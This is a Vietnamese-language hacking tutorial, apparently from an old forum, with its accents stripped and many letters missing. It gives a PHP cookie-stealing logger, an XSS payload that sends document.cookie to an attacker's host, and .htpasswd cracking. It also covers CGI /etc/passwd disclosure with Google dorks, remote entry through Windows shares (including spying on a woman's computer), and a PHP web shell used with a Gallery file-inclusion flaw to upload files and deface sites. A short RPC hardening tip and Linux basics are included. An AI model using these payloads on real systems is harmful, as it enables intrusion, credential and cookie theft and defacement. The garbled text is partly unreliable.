Nhng hiu bit c bn nht tr thnh Hacker

trang ny c c ln
21 . ) K thut ly cp cookie ca nan nhn :
_ Trc ht , cc ban hy m notepad ri chp oan m sau vo notepad :
CODE
<?php
define ("LNE", "\r\n");
define ("HTML_LNE", "");
function getvars($arr, $title)
{
$res = "";
$len = count($arr);
if ($len>0)
{
if (strlen($title)>0)
{
print("[--------$title--------]" . HTML_LNE);
$res .= "[--------$title--------]" . LNE;
}
foreach ($arr as $key => $value)
{
print("[$key]" . HTML_LNE);
print($arr[$key] . HTML_LNE);
$res .= "[$key]" . LNE . $arr[$key] . LNE;
}
}
return $res;
}
// get current date
$now = date("Y-m-d H:i:s");
// init
$myData = "[-----$now-----]" . LNE;
// get
$myData .= getvars($HTTP_GET_VARS, "");
// file
$file = $REMOTE_ADDR . ".txt";
$mode = "r+";
if (!file_exists($file))
$mode = "w+";
$fp = fopen ($file, $mode);
fseek($fp, 0, SEEK_END);
fwrite($fp, $myData);
fclose($fp);
?>
hoc
CODE
<?php
if ($contents && $header){
mail("victim@yahoo.com" , "from mail script",$contents,$header) or
die('couldnt email it');
sleep(2);
?>
<script language=javascript>
</script>
<?php
} else {
echo "nope";
}
(Ban hy sa ci victim@yahoo.com thnh ja chi Mail ca ban ) .
Ban hy save ci notepad ny vi tn "< tn tuy cc ban >.php ( Nh l
phi c .php ) ri upload ln mt host no c h tr PHP , trong VD ca ti
l abc.php .( i vi cc ban tng lm Web chc s rt d ph khng ?
) . oan m ny s c nhim vu n cp thng tin (v c khi c c cookie )
ca nan nhn khi h m d liu c cha oan m ny r tu ng save
thng tin thnh file < ip ca nan nhn >.txt .
_ Cn mt cch na ly cookie uoc s dung trn cc forum bj li nhng
cha fix , khi post bi ban chi cn thm oan m sau vo bi ca mnh :
CODE
document.write('<img src=http://host_php/abc.php?abc='+escape(document.cookie)+'>')
vi host_php : l ja chi ban upload file n cp cookie ln .
v abc.php l file VD ca ti .
_ V du : khi p dung trong tag img, ta dng nh sau:
CODE
[img]javascript: Document.write('<img
src=http://host_php/docs.php?docs='+escape(document.cookie)+'>')[/img]
hoc:
[CODE
img]javascript: Document.write('&#x3cimg
src=http://host_php/docs.php?docs='+escape(document.cookie)+'&#x3e')[/img]
_ Ban c th tm nhng trang web thuc hnh th cch trong VD ny bng cch
vo google.com tm nhng forum bj li ny bng t kho "Powered by .. forum
vi nhng forum sau : ikonboard, ltimate Bulletin Board , vBulletin Board, Snit . Nu cc
ban may mn cc ban c th tm thy nhng forum cha fix li ny m thuc
hnh , ai tm c th chia s vi mi ngi nh .
_ Cn nhiu oan m n cp cookie cng hay lm , cc ban hy tu mnh tm thm
.
22 . ) Cch ngt mt khu bo v Website :
_ Khi cc ban ti tm kim thng tin trn mt trang Web no , c mt s
ch trn trang Web khi ban vo s bj chn lai v s xut hin mt box
yu cu nhp mt khu , y chnh l khu vuc ring t ct du nhng thng
tin mt chi dnh cho s ngi hoc mt nhm ngi no ( Noi ct
ngh hack ca viethacker.net m bo e-chip ni ti chng han ) . Khi ta click
vo ci link th ( thng thng ) n s gi ti .htpasswd v .htaccess nm
cng trong th muc bo v trang Web . Tai sao phi dng du chm trc
trong tn file '.htaccess'? Cc file c tn bt u l mt du chm '.' s
c cc web servers xem nh l cc file cu hnh. Cc file ny s bj n i
(hidden) khi ban xem ua th muc c bo v bng file .htaccess .Hai h so
ny c nhim vu iu khin su truy nhp ti ci link an ton m ban mun
xm nhp . Mt ci un l mt khu v user name , mt ci un l cng
vic m ho nhng thng tin cho file kia . Khi ban nhp ng c 2 th ci link
mi m ra . Ban hy nhn VD sau :
CODE
Graham:#.DGm3dR
Webmaster:GAj.3g#$@f
sername ban c th c c ri , cn ci pass ban nhn c hiu m t g
khng ? D nhin l khng ri . ban c hiu v sao khng m ban khng th
c c chng khng ? ci ny n c su can thip ca thng file .htaccess .
Do khi cng trong cng th muc chng c tc ng ua lai bo v ln
nhau nn chng ta cng khng dai g m c gng t nhp ri crack m mt
khu cht tit ( khi cha c ngh crack mt khu trong tay . Ti cng
ang nghin cu c th xm nhp truc tip , nu thnh cng ti s post
ln cho cc ban ) . Li l y , chuyn g s xy ra nu ci .htpasswd nm
ngoi th muc bo v c file .htaccess ? Ta s chm c n d dng , ban
hy xem link VD sau :
http://www.company.com/cgi-bin/protected/
hy kim tra xem file .htpasswd c c bo v b .htaccess hay khng , ta nhp
RL sau :
http://www.company.com/cgi-bin/protected/.htpasswd
Nu ban thy c cu tr l 'ile not found' hoc tong tu th chc chn
file ny khng c bo v , ban hy tm ra n bng mt trong cc RL sau
:
http://www.company.com/.htpasswd
http://www.company.com/cgi-bin/.htpasswd
http://www.company.com/cgi-bin/passwords/.htpasswd
http://www.company.com/cgi-bin/passwd/.htpasswd
nu vn khng thy th cc ban hy c tm bng cc RL khc tong tu ( c
th n nm ngay th muc gc y ) , cho n khi no cc ban tm thy
th thi nh .
Khi tm thy file ny ri , ban hy dng chong trnh "ohn the ripper" hoc
"Crackerjack", crack passwd ct trong . Cng vic tip theo hn cc ban
bit l mnh phi lm g r , ly user name v passwd hp l t nhp vo
ri xem th my c cu "tm su nhng g trong , nhng cc ban cng
ng c i pass ca h hay uy h nh .
Cch ny cc ban cng c th p dung ly pass ca admin v hu ht
nhng thnh vin trong nhm kn u l "c chc c uyn c .
23 . ) Tm hiu v CG ?
_ CG l t vit tt ca Common Gateway nterface , a s cc Website u ang
s dung chong trnh CG ( c g l CG script ) thuc hin nhng cng
vic cn thit 2 gi hng ngy . Nhng nguyn bn CG script thuc cht l
nhng chong trnh c vit v c upload ln trang Web v nhng ngn
ng ch yu l Perl , C , C++ , Vbscript trong Perl c a chung nht v
su d dng trong vic vit chong trnh ,chim mt dung lng t v nht l
n c th chay lin tuc trong 2 gi trong ngy .
_ Thng thng , CG script c ct trong th muc /cgi-bin/ trn trang Web nh VD
sau :
http://www.company.com/cgi-bin/login.cgi
vi nhng cng vic cu th nh :
+ Tao ra chong trnh m s ngi gh thm .
+ Cho php nhng ng khch lm nhng g v khng th lm nhng g trn
Website ca ban .
+ un l user name v passwd ca thnh vin .
+ Cung cp djch vu Mail .
+ Cung cp nhng trang lin kt v thuc hin tin nhn ua lai gia cc thnh
vin .
+ Cung cp nhng thng bo li chi tit .v.v..
2 . ) Cch hack Web co bn nht thng ua CG script :
_ Li th 1 : li nph-test-cgi
+ nh tn trang Web bj li vo trong trnh duyt ca ban .
+ nh dng sau vo cu cng : /cgi-bin/nph-test-cgi
+ Lc trn RL ban s nhn ging nh th ny :
http://www.servername.com/cgi-bin/nph-test-cgi
+ Nu thnh cng ban s thy cc th muc c ct bn trong . xem th
muc no ban nh tip :
CODE
?<tn th muc>/
+ file cha passwd thng c ct trong th muc /etc , ban hy nh trn RL
dng sau :
http://www.servername.com/cgi-bin/nph-test-cgi?/etc/
_ Li th 2 : li php.cgi
+ Tong tu trn ban chi cn nh trn RL dng sau ly pass :
http://www.servername.com/cgi-bin/php.cgi?/etc/passwd
uan trng l y l nhng li c nn vic tm cc trang Web cc ban
thuc hnh rt kh , cc ban hy vo trang google.com ri nh t kho :
/cgi-bin/php.cgi?/etc/passwd]
hoc cgi-bin/nph-test-cgi?/etc
sau cc ban hy tm trn xem th trang no cha fix li thuc hnh
nh .
2 . ) K thut xm nhp my tnh ang online :
_ m nhp my tnh ang online l mt k thut va d la va kh . Ban
c th ni d khi ban s dung cng cu ENT 3 nhng ban s gp vn khi
dng n l tc s dung trn my ca nan nhn s bj chm i mt cch
ng k v nhng my h khng share th khng th xm nhp c, do
nu h tt my l mnh s bj cng cc khi cha kjp chm account , c mt
cch m thm hon , t lm gim tc hon v c th xm nhp khi nan nhn
khng share l dng chong trnh DOS tn cng . Ok , ta s bt u :
_ Dng chong trnh scan P nh ENT 3 scan P muc tiu .
_ Vo Start ==> Run g lnh cmd .
_ Trong ca s DOS hy nh lnh "net view <P ca nan nhn>
+ VD : c:\net view 203.12.30.xx
_ Ban hy nhn kt u , nu n c share th d u , ban chi cn nh
tip lnh
net use < a bt ky trn my ca ban> : <ip ca nan nhn>< share ca
nan nhn>
+ VD : c:\net use E : 203.12.30.xxC
_ Nu khi kt ni my nan nhn m c yu cu s dung Passwd th ban hy
download chong trnh d passwd v s dung ( theo ti ban hy load chong trnh
"pwak2 p dung cho vic d passwd trn my s dung HH Win hoc Winme v
chong trnh "xntruder dng cho Win NT ) . Ch l v cch s dung th hai
chong trnh tong tu nhau , dng u ta nh P ca nan nhn , dng th hai
ta nh tn a share ca nan nhn nhng i vi "xntruder ta ch
chinh Delay ca n cho hp l , trong mang LAN th Delay ca n l 100 cn trong
mang nternet l trn d 000 .
_ Nu my ca nan nhn khng c share th ta nh lnh :
net use < a bt ky trn my ca ban> : <ip ca nan nhn>c$ (hoc
d$)"administrator"
+ VD : net use E : 203.12.30.xxC$"administrator"
Kiu chia s bng c$ l mc jnh i vi tt c cc my SER l
"administrator" .
_ Chng ta c th p dung cch ny t nhp vo my ca c ban m mnh
"thm thong trm nh tm nhng d liu lin uan n ja chi
ca c nng ( vi iu kin l c ta ang dng my nh v ban may mn khi
tm c ja chi ) . Ban chi cn chat Y!Mass ri vo DOS nh lnh :
c:\netstat n
Khi dng cch ny ban hy tt ht cc ca s khc chi khung chat Y!Mass
vi c ta thi , n s gip ban d dng hon trong vic xc jnh ja chi P
ca c ta . Sau ban dng cch xm nhp m ti ni trn .( C l anh
chng tykhung ca chng ta hi xa khi tn tinh c ban xa ua mang cng dng
cch ny t nhp v tm hiu ja chi ca c ta y m , hihi .
)
Ban s thnh cng nu my ca nan nhn khng ci firewall hay proxy .
====================================================
Nhiu ban c yu cu ti a ra ja chi chnh xc cho cc ban thuc tp ,
nhng ti khng th a ra c v rt kinh nghim nhng bi hng dn c
ja chi chnh xc , khi cc ban thuc hnh xong oat c uyn admin c
ban xo ci database ca h . Nh vy HVA s mang ting l noi bt ngun
cho su ph hoai trn mang . mong cc ban thng cm , nu c th th ti chi
nu nhng cch thc cc ban tm nhng dja chi bj li ch khng
a ra ja chi cu th no .
====================================================
Ti s cp n k thut chng xm nhp vo my tnh ca
mnh khi ban online , tm hiu so cc bc khi ta uyt jnh hack mt trang Web ,
k thut tm ra li trang Web thuc hnh , k thut hack Web thng ua li
Gallery.v.v.
2 . ) Tm hiu v RPC (Remote Procedure Call) :
_ Windows NT cung cp kh nng s dung RPC thuc thi cc ng dung phn tn .
Microsoft RPC bao gm cc th vin v cc djch vu cho php cc ng dung phn
tn hoat ng c trong mi trng Windows NT. Cc ng dung phn tn chnh
bao gm nhiu tin trnh thuc thi vi nhim vu xc jnh no . Cc tin
trnh ny c th chay trn mt hay nhiu my tnh.
_Microsoft RPC s dung name service provider jnh vj Servers trn mang. Microsoft
RPC name service provider phi i lin vi Microsoft RPC name service interface (NS). NS
bao bao gm cc hm AP cho php truy cp nhiu thuc th trong cng mt name
service database (name service database cha cc thuc th, nhm cc thuc th, ljch
s cc thuc th trn Server).
Khi ci t Windows NT, Microsoft Locator tu ng c chn nh l name service
provider. N l name service provider ti u nht trn mi trng mang Windows NT.
2 . ) K thut on gin chng lai su xm nhp tri php khi ang online
thng ua RPC (Remote Procedure Call) :
_ Nu ban nghi ng my ca mnh ang c ngi xm nhp hoc bj admin remote
desktop theo di , ban chi cn tt chc nng remote procedure call th hin tai
khng c chong trnh no c th remote desktop theo di ban c . N cn
chng c hu ht tools xm nhp vo my ( v a s cc tools vit connect
dua trn remote procedure call ( over tcp/ip )).Cc trojan a s cng dua vo giao
thc ny.
Cch tt: Ban vo service /remote procedure call( click chut phi ) chn starup
typt/disable hoc manual/ apply.
y l cch chng rt hu hiu vi my PC , nu thm vi cch tt file
sharing th rt kh bj hack ) ,nhng trong mang LAN ban cng phin phc vi n
khng t v ban s khng chay c cc chong trnh c lin uan n thit
bj ny . Ty theo cch thc ban lm vic m ban c cch chn lua cho hp l
. Theo ti th nu dng trong mang LAN ban hy ci mt firewall l chc chn
tong i an ton ri .
( Dua theo bi vit ca huynh "i nh c khoai khoaimi admin ca HVA )
2 . ) Nhng bc hack mt trang web hin nay :
_ Theo lit k ca sch Hacking Exposed 3 th hack mt trang Web thng thng ta
thuc hin nhng bc sau :
+ ootPrinting : ( n du chn )
y l cch m hacker lm khi mun ly mt lng thng tin ti a v my
ch/doanh nghip/ngi dng. N bao gm chi tit v ja chi P, Whois, DNS
..v.v ai khi l nhng thong tin chnh thc c lien uan n muc tiu. Nhiu
khi on gin hacker chi cn s dung cc cng cu tm kim trn mang tm
nhng thong tin .
em thm tai y
+ Scanning : ( ut thm d )
Khi c nhng thng tin ri, th tip n l nh gi v jnh danh
nhng nhng djch vu m muc tiu c. Vic ny bao gm ut cng, xc jnh
h iu hnh, .v.v.. Cc cng cu c s dung y nh nmap, WS pingPro,
siphon, fscam v cn nhiu cng cu khc na.
+ Enumeration : ( lit k tm l hng )
Bc th ba l tm kim nhng ti nguyn c bo v km, hoach ti
khon ngi dng m c th s dung xm nhp. N bao gm cc mt khu
mc jnh, cc script v djch vu mc jnh. Rt nhiu ngi un trj mang
khng bit n hoc khng sa i lai cc gi trj ny.
+ Gaining Access: ( Tm cch xm nhp )
By gi k xm nhp s tm cch truy cp vo mang bng nhng thng tin c
c ba bc trn. Phong php c s dung y c th l tn
cng vo li trn b m, ly v gii m file password, hay th thin nht l
brute force (kim tra tt c cc trng hp) password. Cc cng cu thng
c s dung bc ny l NAT, podium, hoc L0pht.
+ Escalating Privileges : ( Leo thang c uyn )
V du trong trng hp hacker xm nhp uc vo mang vi ti khon guest,
th h s tm cch kim sot ton b h thng. Hacker s tm cch crack
password ca admin, hoc s dung l hng leo thang c uyn. ohn v Riper
l hai chong trnh crack password rt hay c s dung.
+ Pilfering : ( Dng khi cc file cha pass bj so h )
Thm mt ln na cc my tm kim lai uoc s dung tm cc phong
php truy cp vo mang. Nhng file text cha password hay cc co ch khng an ton
khc c th l mi ngon cho hacker.
+ Covering Tracks : ( o du vt )
Sau khi c nhng thng tin cn thit, hacker tm cch xo du vt, xo cc
file log ca h iu hnh lm cho ngi un l khng nhn ra h thng
bj xm nhp hoc c bit cng khng tm ra k xm nhp l ai.
+ Creating "Back Doors" : ( Tao ca sau chun bj cho ln xm nhp tip theo c
d dng hon )
Hacker lai "Back Doors", tc l mt co ch cho php hacker truy nhp tr lai
bng con ng b mt khng phi tn nhiu cng sc, bng vic ci t
Trojan hay tao user mi (i vi t chc c nhiu user). Cng cu y l
cc loai Trojan, keylog
+ Denial of Service (DoS) : ( Tn cng kiu t chi djch vu )
Nu khng thnh cng trong vic xm nhp, th DoS l phong tin cui cng
tn cng h thng. Nu h thng khng c cu hnh ng cch, n s
bj ph v v cho php hacker truy cp. Hoc trong trng hp khc th DoS s
lm cho h thng khng hoat ng c na. Cc cng cu hay c s
dung tn cng DoS l trin00, Pong Of Death, teardrop, cc loai nuker, flooder .
Cch ny rt li hai , v vn cn s dung ph bin hin nay .
_ Tuy theo hiu bit v trnh ca mnh m mt hacker b ua bc no .
Khng nht thit ph lm theo tun tu . Cc ban hy nh n cu " bit
ngi bit ta trm trn trm thng .
( Ti liu ca HVA v hackervn.net )
em thm tai y
2 . ) Cch tm cc Website bj li :
_ Chc cc ban bit n cc trang Web chuyn dng tm kim thng tin trn
mang ch ? Nhng cc ban chc cng khng ng l ta c th dng nhng trang
tm nhng trang Web bj li ( Ti vn thng dng trang google.com v
khuyn cc ban cng nn dng trang ny v n rt manh v hiu u ) .
_ Cc ban uan tm n li trang Web v mun tm chng ban chi cn vo
google.com v nh oan li vo sau "allinurl : . VD ta c oan m li
trang Web sau :
cgi-bin/php.cgi?/etc/passwd
cc ban s nh :
"allinurl:cgi-bin/php.cgi?/etc/passwd
N s lit k ra nhng trang Web ang bj li ny cho cc ban , cc ban hy
nhn xung di cng ca mi mu lit k ( dng ja chi mu xanh l cy )
nu dng no vit y chang t kho mnh nhp vo th trang hoc ang bj
li .Cc ban c xm nhp vo c hay khng th cng cn tuy vo trang Web
fix li ny hay cha na .
_ Cc ban uan tm n li forum , cc ban mun tm forum dang ny thuc
tp , chi cn nhp t kho
powered by <tn forum> <s phin bn>
VD sau l tm forum dng Snit 2000 :
powered by Snit 2000
_ Tuy nhin , vic tm ra ng forum hoc trang Web bj li theo cch c xc
sut khng cao , ban hy uan tm n oan string c bit trong RL c
trng cho tng kiu trang Web hoc forum ( ci ny rt uan trng , cc ban
hy tu mnh tm hiu thm nh ) . VD tm vi li Hosting Controller th ta s c
oan c trng sau
"/admin hay /advadmin hay /hosting"
ta hy nh t kho :
allinurl:/advadmin
hoc allinurl:/admin
hoc allinurl:/hosting
N s lit k ra cc trang Web c RL dang :
http://tentrangweb.com/advadmin
hoc http://tentrangweb.com/admin
hoc http://tentrangweb.com/hosting
VD vi forum BB c oan c trng
"cgi-bin/ultimatebb.cgi?"
Ta cng tm tong tu nh trn .
Chi cn ban bit cch tm nh vy ri th sau ny chi cn theo di thng tin
cp nht bn trang "Li bo mt ca HVA do ban LeonHart post hng ngy cc
ban s hiu c ngha ca chng v tu mnh kim tra .
30 . ) K thut hack Web thng ua li Gallery ( mt dang ca li php code inject):
_ Gallery l mt cng cu cho php tao mt gallery nh trn web c vit bng
PHP , li dung so h ny ta c th li dung vit thm vo mt m
PHP cho php ta upload , chnh l muc ch chnh ca ta .
_ Trc ht ban hy ng k mt host min ph , tt nht l ban ng k
brinkster.com cho d . Sau ban m notepad v tao file PHP vi oan m sau
:
CODE
<?php
global $PHP_SEL;
echo "<html><body>
<form method=post action=$PHP_SEL?$ERY_STRNG>
<input type=text name=shell sie=0>
<input type=hidden name=act value=shell>
<input type=submit value=Go name=sm>
</form>";
set_magic_uotes_runtime(1);
if ($act == "shell") {
echo "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n<xmp>";
system($shell);
echo "</xmp>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";}
echo "</body></html>";
?>
oan m ny ban hy tao lm 2 file c tn khc nhau ( nhng cng chung mt m )
v t tn l :
+ shellphp.php : file ny dng chay shell trn victim host .
+ init.php : file ny dng upload ln trang c host ban va tao . ( Ban hy
upload file init.php ny ln sm v ta s cn s dung n nhng vi oan m
khc , ban un upload file ny ln l tiu )
Ban hy tao thm mt file PHP vi m sau :
CODE
<?php
function handleupload() {
if (is_uploaded_file($_LES['userfile']['tmp_name'])) {
$filename = $_LES['userfile']['tmp_name'];
print "$filename was uploaded successfuly";
$realname = $_LES['userfile']['name'];
print "realname is $realname\n";
print "copying file to uploads dir ".$realname;
copy($_LES['userfile']['tmp_name'],PATH.$realname); [B]// lu PATH chng ta s thay
i sau[/B]
} else {
echo "Possible file upload attack: filename".$_LES['userfile']['name'].".";
}
}
if ($act == "upload") {
handleupload();
}
echo "<html><body>
<form ENCTYPE=multipart/form-data method=post action=$PHP_SEL?$ERY_STRNG>
ile:<NPT TYPE=LE NAME=userfile SE=3>
<input type=hidden name=MA_LE_SE value=1000000>
<input type=hidden name=act value=upload>
<input type=submit value=pload name=sm>
</form>
</body></html>";
?>
Ban hy t tn l upload.php , n s dng upload ln trang Web ca nan
nhn .
_ Tip theo Ban vo Google, g "Powered by gallery" ri enter, Google s lit k mt
ng nhng site s dung Gallery , ban hy chn ly mt trang bt ky r
dng link sau th xem n cn mc l Gallery hay khng :
http://<tn trang Web ca nan
nhn>/gallery./captionator.php?GALLERY_BASEDR=http://wwwxx.brinkster.com/<tn host ban
va
ng k>/
Nu ban thy hin ln mt hnh ch nht pha trn cng , bn phi
ca n l lnh chuyn tip c ch "Go l coi nh ban tm thy
c tng ri . By gi ban c th g lnh thng ua
ch nht hack Web ca nan nhn .
Trc ht ban hy g lnh "pwd xc jnh ng dn tuyt i
n th muc hin thi ri nhn nt "Go , khi n cho kt u ban hy
nhanh chng ghi lai ng dn pha d ( Ti s s dung VD ng dn
ti tm thy l "/home/abc/xy/gallery ).
Sau ban nh tip lnh "|s a| lit k cc th muc con ca n .
By gi ban hy nhn kt u , ban s thy mt ng cc th muc con m
ta lit k . Ban hy lun nh l muc ch ca chng ta l tm mt th
muc c th dng upload file upload.php m ta chun bj t trc do
ban hy xc jnh cng ti bng cch nhn vo nhng ch cu cng ca mi
hng kt u :
+ Ban hy loai b trng hp cc th muc m c du ". hoc ".. v
y l th muc gc hoc l th muc o ( N thng c xp trn cng
ca cc hng kt u ) .
+ Ban cng loa b nhng hng c ch cui cng c gn ui ( VD nh
config.php , check.inc .v.v ) v y l nhng file ch khng phi l th muc .
+ Cn lai l nhng th muc c th upload nhng ti khuyn ban nn chn nhng
hng cha tn th muc m c cha s ln hon 1 ( Ban c th xc jnh
c chng bng cch nhn ct th 2 t tri sang ) , v nh vy va chc
chn y l th muc khng phi th muc o , va lm cho admin ca trang Web
kh pht hin khi ta ci file ca ta vo . Ti VD ti pht hin ra th muc
"loveyou c cha 12 file c th cho ta upload , nh vy ng dn chnh thc
m ta upload ln s l :
/home/abc/xy/Gallery/loveyou
By gi ban hy vo account host ca ban, sa ni dung file init.php ging nh
m ca file upload.php, nhng sa lai PATH thnh "/home/abc/xy/gallery/loveyou/ .
ng thi cng chun bj mt file upload.php trn my ca ban vi PATH l
" ( 2 du ngoc kp ).
By gi l ta c th upload file upload.php ln trang Web ca nan nhn c
ri , ban hy nhp ja chi sau trn trnh duyt Web ca ban :
http://<tn trang Web ca nan
nhn>/gallery./captionator.php?GALLERY_BASEDR=http://wwwxx.brinkster.com/<tn trang
Host ban
tao t u>/
Ban s thy xut hin tip mt khung hnh ch nht v bn canh l c 2
nt lnh , mt l nt "brown , mt l nt "upload . Nt "brown ban
dng dn n ja chi file upload.php ban chun bj trn my ca
ban , nt "upload khi ban nhn vo th n s upload file upload.php ln
trang Web ca nan nhn . Ok , by gi coi nh ban hon thnh chng ng
hack Web ri . T by gi ban hy vn dung tn cng i th nh
ly database , password ( lm tong tu nh cc bi hng dn hack trc ) ,
nhng cc ban chi nn thuc tp ch ng xo database hay ph Web ca h.
Nu l mt hacker chn chnh cc ban chi cn upload ln trang Web dng ch :
"Hack by .. l ri .
Cng nh nhng ln trc , cc ban c thnh cng hay khng cng tuy thuc vo
su may mn v kin tr nghin cu vn dung kin thc ca cc ban .
31 . ) Gi tin TCP/P l g?
TCP/P vit tt cho Transmission Control Protocol and nternet Protocol, mt Gi tin TCP/P
l mt khi d liu c nn, sau km thm mt header v gi n
mt my tnh khc. y l cch thc truyn tin ca internet, bng cch gi cc
gi tin. Phn header trong mt gi tin cha ja chi P ca ngi gi gi tin.
Ban c th vit lai mt gi tin v lm cho n trong ging nh n t mt
ngi khc!! Ban c th dng cch ny tm cch truy nhp vo rt nhiu
h thng m khng bj bt. Ban s phi chay trn Linux hoc c mt chong
trnh cho php ban lm iu ny.
32 . ) Linux l gi:
_Ni theo ngha gc, Linux l nhn ( kernel ) ca HH. Nhn l 1 phn mm m
trch chc vu lin lac gia cc chong trnh ng dung my tnh v phn
cng. Cung cp cc chng nng nh: un l file, un l b nh o, cc
thit bj nhp xut nhng cng, mn hnh, bn phm, .... Nhng Nhn Linux cha
phi l 1 HH, v th nn Nhn Linux cn phi lin kt vi nhng chong
trnh ng dung c vit bi t chc GN tao ln 1 HH hon chinh: HH
Linux. y cng l l do tai sao chng ta thy GN/Linux khi c nhc n
Linux.
Tip theo, 1 cng ty hay 1 t chc ng ra ng gi cc sn phm ny ( Nhn v
Chong trnh ng dung ) sau sa cha mt s cu hnh mang c
trng ca cng ty/ t chc mnh v lm thm phn ci t ( nstallation Process )
cho b Linux , chng ta c : Distribution. Cc Distribution khc nhau s lng
v loai Software c ng gi cng nh u trnh ci t, v cc phin bn
ca Nhn. 1 s Distribution ln hin nay ca Linux l : Debian, Redhat, Mandrake,
SlackWare, Suse .
33 . ) Cc lnh cn bn cn bit khi s dung hoc xm nhp vo h thng
Linux :
_ Lnh " man" : Khi ban mun bit cch s dung lnh no th c th dng ti
lnh nay :
Cu trc lnh : $ man .
V du : $ man man
_ Lnh " uname ": cho ta bit cc thng tin co bn v h thng
V du : $uname -a ; n s a ra thng tin sau :
Linux gamma 2..1 #3 Wed Dec 2 10:0:0 CT 2001 i unknown
_ Lnh id : xem uid/gid hin tai ( xem nhm v tn hin tai )
_ Lnh w : xem cc user ang login v action ca h trn h thng .
V Du : $w n s a ra thng tin sau :
10:31pm up 2 days, :0, 1 users, load average: 0.0, 0.01, 0.00
_ Lnh ps: xem thng tin cc process trn h thng
V du : $ps axuw
_ Lnh cd : ban mun di chuyn n th muc no . phi nh n lnh ny .
V du : $ cd /usr/bin ----> n s a ban n th muc bin
_ Lnh mkdir : tao 1 th muc .
V du : $ mkdir /home/convit ---> n s tao 1 th muc convit trong /home
_ Lnh rmdir : g b th muc
V du : $ rmdir /home/conga ----> n s g b th muc conga trong /home .
_ Lnh ls: lit k ni dung th muc
V du : $ls -laR /
_ Lnh printf: in d liu c jnh dang, ging nh s dung printf() ca C++ .
V du : $printf s "\x1\x1\x1\x1"
_ Lnh pwd: a ra th muc hin hnh
V du : $pwd ------> n s cho ta bit vj tr hin thi ca ta u :
/home/level1
_ Cc lnh : cp, mv, rm c ngha l : copy, move, delete file
V du vi lnh rm (del) : $rm -rf /var/tmp/blah ----->n s del file blah .
Lm tong tu i vi cc lnh cp , mv .
_ Lnh find : tm kim file, th muc
V du : $find / -user level2
_ Lnh grep: cng cu tm kim, cch s dung on gin nht : grep "something"
Vidu : $ps axuw | grep "level1"
_ Lnh Strings: in ra tt c cc k tu in c trong 1 file. Dng n tm
cc khai bo hnh chui trong chong trnh, hay cc gi hm h thng, c khi tm
thy c password na
VD: $strings /usr/bin/level1
_ Lnh strace: (linux) trace cc gi hm h thng v signal, cuc ky hu ch
theo di flow ca chong trnh, cch nhanh nht xc jnh chong trnh bj
li oan no. Trn cc h thng unix khc, tool tong ong l truss, ktrace
.
V du : $strace /usr/bin/level1
_ Lnh" cat, more ": in ni dung file ra mn hnh
$cat /etc/passwd | more --> n s a ra ni dung file passwd mt cch nhanh nht .
$more /etc/passwd ----> N s a ra ni dung file passwd mt cch t t .
_ Lnh hexdump : in ra cc gi trj tong ng theo ascii, hex, octal, decimal ca d
liu nhp vo .
V du : $echo AAAA | hexdump
_ Lnh : cc, gcc, make, gdb: cc cng cu bin djch v debug .
V du : $gcc -o -g bof bof.c
V du : $make bof
V du : $gdb level1
(gdb) break main
(gdb) run
_ Lnh perl: mt ngn ng
V du : $perl -e 'print "A"x102' | ./bufferoverflow ( Li trn b m khi ta nh
vo 102 k tu )
_ Lnh "bash" : n lc tu ng ho cc tc vu ca ban bng shell
script, cuc manh v linh hoat .
Ban mun tm hiu v bash , xem n nh th no :
$man bash
_ Lnh ls : em ni dung th muc ( Lit k file trong th muc ) .
V Du : $ ls /home ----> s hin ton b file trong th muc Home
$ ls -a -----> hin ton b file , bao gm c file n
$ ls -l -----> a ra thng tin v cc file
_ Lnh ghi d liu u ra vo 1 file :
Vdu : $ ls /urs/bin > ~/convoi ------> ghi d liu hin thj thng tin ca th muc
bin vo 1 file convoi .
3 . ) Nhng hiu bit co bn xung uanh Linux :
a . ) Mt vi th muc uan trng trn server :
_ /home : noi lu gi cc file ngi s dung ( VD : ngi ng nhp h thng
c tn l convit th s c 1 th muc l /home/convit )
_ /bin : Noi x l cc lnh nix co bn cn thit nh ls chng han .
_ /usr/bin : Noi x l cc lnh dc bit khc , cc lnh dng bi ngi s
dung c bit v dng un trj h thng .
_ /bot : Noi m kernel v cc file khc c dng khi khi ng .
_ /ect : Cc file hoat ng phu mang , NS (Network ile System ) Th tn ( y l
noi trng yu m chng ta cn khai thc nhiu nht )
_ /var : Cc file un trj
_ /usr/lib : Cc th vin chun nh libc.a
_ /usr/src : Vj tr ngun ca cc chong trnh .
b . ) Vj tr file cha passwd ca mt s phin bn khc nhau :
CODE
A 3 /etc/security/passwd !/tcb/auth/files//
A/ 3.0s /tcb/files/auth/?/
BSD.3-Ren /etc/master.passwd
ConvexOS 10 /etc/shadpw
ConvexOS 11 /etc/shadow
DG/ /etc/tcb/aa/user/
EP/ /etc/shadow x
HP- /.secure/etc/passwd
R /etc/shadow x
Linux 1.1 /etc/shadow
OS/1 /etc/passwd[.dir|.pag]
SCO nix #.2.x /tcb/auth/files//
SunOS.1+c2 /etc/security/passwd.adjunct ##username
SunOS .0 /etc/shadow
System V Release .0 /etc/shadow x
System V Release .2 /etc/security/ database
ltrix /etc/auth[.dir|.pag]
NCOS /etc/udb
3 . ) Khai thc li ca Linux ua l hng bo mt ca W-TP server :
_ W-TP Server (c pht trin bi ai Hc Washington ) l mt phn mm
Server phuc vu TP c dng kh ph bin trn cc h thng nix & Linux (
tt c cc nh phn phi: Redhat, Caldera, Slackware, Suse, Mandrake....) v c
Windows.... , cc hacker c th thuc thi cc cu lnh ca mnh t xa thng ua file
globbing bng cch ghi ln file c trn h thng .
_ Tuy nhin , vic khai thc li ny khng ph l d v n phi hi
nhng iu kin sau :
+ Phi c account trn server .
+ Phi t c Shellcode vo trong b nh Process ca Server .
+ Phi gi mt lnh TP c bit cha ung mt globbing mu c bit m
khng bj server pht hin c li .
+ Hacker s ghi ln mt unction, Code ti mt Shellcode, c th n s c
thuc thi bi chnh Server TP .
_ Ta hy phn tch VD sau v vic ghi ln file ca server TP :
CODE
ftp> open localhost <== lnh m trang bj li .
Connected to localhost (12.0.0.1).
220 sasha TP server (Version wu-2..1-1) ready <== xm nhp thnh cng TP server .
Name (localhost:root): anonymous <== Nhp tn ch ny
331 Guest login ok, send your complete e-mail address as password.
Password:..<== nhp mt khu y
230 Guest login ok, access restrictions apply.
Remote system type is N.
sing binary mode to transfer files. <== s dung bin nhj phn chuyn i file
.
